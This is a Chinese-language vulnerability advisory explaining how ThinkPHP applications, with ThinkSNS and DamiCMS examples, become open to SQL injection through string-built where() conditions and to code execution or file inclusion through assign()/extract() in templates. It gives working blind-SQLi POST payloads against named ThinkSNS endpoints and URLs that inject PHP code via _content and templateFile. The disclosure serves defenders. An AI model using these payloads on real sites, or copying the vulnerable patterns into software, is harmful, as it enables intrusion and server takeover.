|从ThinkPHP谈基于框架开发程序的安全性（从SQL注入到代码执行）

从ThinkPHP谈基于框架开发程序的安全性（从SQL注入到代码执行）

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述：从ThinkPHP谈基于框架开发程序的安全性，以ThinkPHP，ThinkSNS，大米CMS等最新版漏洞证明为例 ### 详细说明：从ThinkPHP谈基于框架开发程序的安全性，以ThinkPHP，ThinkSNS，大米CMS等为例之前在看ThinkPHP开发手册的时候看到这个： ``` 字符串方式字符串方式条件即以字符串的方式将条件作为 where() 方法的参数，例子： $Dao = M("User"); $List = $Dao->where('uid<10 AND email="Jack@163.com"')->find(); 实际执行的 SQL 为： SELECT * FROM user WHERE uid<10 AND email="Jack@163.com" LIMIT 1 字符串方式设定的条件即为实际 SQL 执行的条件，也是最接近原生 SQL 的方式，ThinkPHP 不会对条件做任何（类型上的）检查。 ``` 这就是说当程序员使用GPC接受的值以字符串形式进入where中，此值是原生的字符换，不会进行任何检查和处理，即便是错误类型和恶意sql语句等，这样就导致sql注入的隐患存在了。我们举个例子，拿最新版的ThinkPHP为例：注意这里$role = $_POST['role']，直接将POST的值付给了变量role 然后变量以role拼接字符串的形式进入了where中： ``` 这样没有单引号保护 $row = M('user')->where('role='.$role)->find(); 或者这样加上单引号保护 $row = M('user')->where("role='".$role."'")->find(); ``` 不懂安全的程序员任务，将role变量带入where中，ThinkPHP应该会自己处理，应该是安全的但事实上，这样就导致了SQL注入，不管是否加了单引号 [<img src="https://images.seebug.org/upload/201412/22231338b29493be44d82443f21738b00e2f0d57.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/22231338b29493be44d82443f21738b00e2f0d57.png) 数据库执行记录： [<img src="https://images.seebug.org/upload/201412/22231353a224db0e86fb239fca185f9b3111a9f3.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/22231353a224db0e86fb239fca185f9b3111a9f3.png) 恶意的sql语句内容成功进入了sql语句，没有进行任何检测处理。可能大家觉的这样写很可笑，但是在实际应用和程序中，这样写的程序员很多就算使用官方推荐的I方法进行数据的获取，同样存在问题。 ``` public function test(){ if (IS_POST) { $role = I('post.role'); if (empty($role)) { $this->error('角色不能为空'); } $row = M('user')->where('role='.$role)->find(); //$row = M('user')->where("role='".$role."'")->find(); if (empty($row)) { echo 0; }else{ echo 1; var_dump($row); } } } ``` 即使这样使用官方推荐的I方法还是存在同意的问题。 [<img src="https://images.seebug.org/upload/201412/222319178e94caebfd86d046b40d109f05e55c02.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/222319178e94caebfd86d046b40d109f05e55c02.png) 所以只要程序员在基于ThinkPHP开发应用程序时，过度相信框架本身的安全性而未自己做好安全检测处理时，会带来很多安全问题，而且都是大面积的。比如最新版的ThinkSNS两处，当然不止这两处了：第一处，文件：/apps/weiba/Lib/Action/IndexAction.class.php ``` /** * 删除帖子 * @return void */ public function postDel(){ $weibaid = D('weiba_post')->where('post_id='.intval($_POST['post_id']))->getField('weiba_id'); if ( !CheckWeibaPermission( '' , $weibaid , 'weiba_del') ){ if ( !CheckPermission('weiba_normal','weiba_del') ){ echo 0;return; } } $post_id = $_POST['post_id']; if(D('weiba_post')->where('post_id='.$post_id)->setField('is_del',1)){ $post_detail = D('weiba_post')->where('post_id='.$post_id)->find(); ``` 这里在删除帖子时，$post_id = $_POST['post_id'] 然后$post_id拼接字符串形式进入where中，跟我们前面讲的问题一样，导致sql注入产生发送如下请求即可进行盲注： ``` url：http://localhost/thinksns/index.php?app=weiba&mod=Index&act=postDel post_data：post_id=1 and if(mid(user(),1,1)=char(114),sleep(1*5),null) referer：http://localhost/thinksns/index.php?app=weiba&mod=Index&act=postDel ``` 第二处，文件：/apps/w3g/Lib/Action/IndexAction.class.php ``` //获取最新微博数 function countnew(){ $map="weibo_id>{$_POST['nowMaxID']} AND isdel=0"; $map.=" AND ( uid IN (SELECT fid FROM ".C('DB_PREFIX')."weibo_follow WHERE uid=$this->uid) OR uid=$this->uid )"; $countnew = M('Weibo')->where($map)->count(); echo $countnew?$countnew:'0'; } ``` 注意这里的： $map="weibo_id>{$_POST['nowMaxID']} AND isdel=0"; 其中$_POST['nowMaxID']直接拼接到字符串中，最后map进入了where进行查询，导致注入发送如下请求即可进行盲注： ``` url：http://localhost/thinksns/index.php?app=w3g&mod=Index&act=countnew post_data：nowMaxID=1 and if(mid(user(),1,1)=char(114),sleep(1*5),null)%23 referer：http://localhost/thinksns/index.php?app=w3g&mod=Index&act=countnew ``` 再比如最新版的大米CMS：大米CMS之前的几处漏洞： [WooYun: 大米CMS某处SQL盲注绕过防御](http://www.wooyun.org/bugs/wooyun-2014-081510) [WooYun: 大米CMS某处SQL盲注2](http://www.wooyun.org/bugs/wooyun-2014-081519) [WooYun: 大米CMS某处SQL盲注3绕过补丁及防御](http://www.wooyun.org/bugs/wooyun-2014-081842) 还有最新提交的两处： http://www.wooyun.org/bugs/wooyun-2014-087947/trace/7880e3736bbf2c91c7c7e9dc17ec68a8 http://www.wooyun.org/bugs/wooyun-2014-087989/trace/876654a7a2c8fc9bae225b34ab148a6e 都是因为通过GPC获取值，然后通过字符串直接进入了where中，导致的注入具体就不在列举了。再来谈谈ThinkPHP的模板解析导致的代码执行问题：在ThinkPHP中模板变量的赋值通过assign函数进行，模板变量的解析通过display函数。文件ThinkPHP\Library\Think\view.class.php： ``` /** * 模板变量赋值 * @access public * @param mixed $name * @param mixed $value */ public function assign($name,$value=''){ if(is_array($name)) { $this->tVar = array_merge($this->tVar,$name); }else { $this->tVar[$name] = $value; } } ``` 如果传入的是数组，那么直接将数组合并，然后载赋值到到tVar ``` /** * 加载模板和页面输出可以返回输出内容 * @access public * @param string $templateFile 模板文件名 * @param string $charset 模板输出字符集 * @param string $contentType 输出类型 * @param string $content 模板输出内容 * @param string $prefix 模板缓存前缀 * @return mixed */ public function display($templateFile='',$charset='',$contentType='',$content='',$prefix='') { G('viewStartTime'); // 视图开始标签 Hook::listen('view_begin',$templateFile); // 解析并获取模板内容 $content = $this->fetch($templateFile,$content,$prefix); // 输出模板内容 $this->render($content,$charset,$contentType); // 视图结束标签 Hook::listen('view_end'); } ``` 进入编译函数fetch： ``` public function fetch($templateFile='',$content='',$prefix='') { if(empty($content)) { $templateFile = $this->parseTemplate($templateFile); // 模板文件不存在直接返回 if(!is_file($templateFile)) E(L('_TEMPLATE_NOT_EXIST_').':'.$templateFile); } // 页面缓存 ob_start(); ob_implicit_flush(0); if('php' == strtolower(C('TMPL_ENGINE_TYPE'))) { // 使用PHP原生模板 $_content = $content; // 模板阵列变量分解成为独立变量 extract($this->tVar, EXTR_OVERWRITE); // 直接载入PHP模板 empty($_content)?include $templateFile:eval('?>'.$_content); }else{ // 视图解析标签 $params = array('var'=>$this->tVar,'file'=>$templateFile,'content'=>$content,'prefix'=>$prefix); Hook::listen('view_parse',$params); } // 获取并清空缓存 $content = ob_get_clean(); // 内容过滤标签 Hook::listen('view_filter',$content); // 输出模板文件 return $content; } ``` 当使用PHP原生模板时，会调用extract把tVar导入到变量表里，然后会检测$content变量是否存在，如果存在就使用eval执行，否则include $templateFile。可以看到这里使用了extract函数，extract作用是从数组中把变量导入到当前的符号表中，而第二个参数表示如果有冲突，就覆盖已有变量。因此此处如果$this->tVar可控的话，那么就可以覆盖掉$templateFile变量造成任意文件包含，或者覆盖$content造成任意代码执行。所以当程序员把GPC接受的值传给assign，导致$this->tVar可控，这是就导致文件包含或者代码执行漏洞了，直接getshell。举个例子： ``` <?php namespace Home\Controller; use Think\Controller; class IndexController extends Controller { public function local_include(){ $var = $_GET; $this->assign($var); $this->display(); } } ``` 这里将$_GET赋值给$var，然后进入assign，最后导致漏洞产生： ``` 代码执行： http://localhost/ThinkPHP_3.2.2_full/index.php/home/index/local_include?_content=%3C%3Fphp%20phpinfo%28%29%3B%3F%3E 文件包含： http://localhost/ThinkPHP_3.2.2_full/index.php/home/index/local_include?templateFile=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4%3D ``` [<img src="https://images.seebug.org/upload/201412/23001948282c1dfafd8db7e777f8a25ec37297c4.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/23001948282c1dfafd8db7e777f8a25ec37297c4.png) 这里最好的例子就是ThinkSNS了： [WooYun: ThinkSNS任意文件包含（可getshell）](http://www.wooyun.org/bugs/wooyun-2014-056641) [WooYun: ThinkSNS第三弹七处前台GetShell](http://www.wooyun.org/bugs/wooyun-2014-081755) 当然，按照这里的方法，可找到ThinkSNS不下10处这里的问题直接getshell也是很轻松的。 ======================================================================= 以上漏洞都是从最新版的ThinkPHP中分析得到虽然说ThinkPHP现在做的很不错，用户量很大所以很多新手，很多安全意识差的程序员就过于相信框架本身的安全性在开发时就免去了自身的处理再加上开发人员的低安全意识和大意，产生漏洞的几率就更大了既然作为框架这样的基础型的东西，根基一样要打好，否则像上面这样的问题都是很严重的定时炸弹，总会有爆发的时候，杀伤力还是很大的。 ### 漏洞证明： sql注入 [<img src="https://images.seebug.org/upload/201412/230036060db69d1a0a1886371c07414a3df473b0.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/230036060db69d1a0a1886371c07414a3df473b0.png) 代码执行 [<img src="https://images.seebug.org/upload/201412/23003627e5249e9f104b0cdafbd7bf7eae4646e7.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/23003627e5249e9f104b0cdafbd7bf7eae4646e7.png)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™